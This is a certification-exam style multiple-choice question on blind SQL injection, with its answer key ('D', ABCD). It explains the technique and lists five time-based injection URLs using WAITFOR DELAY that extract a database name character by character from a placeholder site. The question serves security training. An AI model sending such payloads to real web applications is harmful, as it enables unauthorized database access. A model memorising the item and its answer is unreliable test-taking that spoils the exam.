A Blind SQL injection is a type of SQL Injection attack that asks the database true or false
questions and determines the answer based on the application response. This attack is often
used when the web application is configured to show generic error messages, but has not
mitigated the code that is vulnerable to SQL injection.
It is performed when an error message is not received from application while trying to exploit
SQL vulnerabilities. The developer’s specific message is displayed instead of an error
message. So it is quite difficult to find SQL vulnerability in such cases.
A pen tester is trying to extract the database name by using a blind SQL injection. He tests
the database using the below query and finally finds the database name.
http://juggyboy.com/page.aspx?id=1 ; IF (LEN(DB_NAME())=4) WAITFOR DELAY
’00:00:10′–
http://juggyboy.com/page.aspx?id=1 ; IF (ASCII(lower(substring((DB_NAME()),1,1)))=97)
WAITFOR DELAY ’00:00:10′–
http://juggyboy.com/page.aspx?id=1 ; IF (ASCII(lower(substring((DB_NAME()),2,1)))=98)
WAITFOR DELAY ’00:00:10′–
http://juggyboy.com/page.aspx?id=1 ; IF (ASCII(lower(substring((DB_NAME()),3,1)))=99)
WAITFOR DELAY ’00:00:10′–
http://juggyboy.com/page.aspx?id=1 ; IF (ASCII(lower(substring((DB_NAME()),4,1)))=100)
WAITFOR DELAY ’00:00:10′–
What is the database name?
A.
WXYZ
B.
PQRS
C.
EFGH
D.
ABCD
Explanation:
Reference:
http://www.scribd.com/doc/184891028/CEHv8-Module-14-SQL-Injection-pdf(see module 14,
page 2049 to 2051)
“D”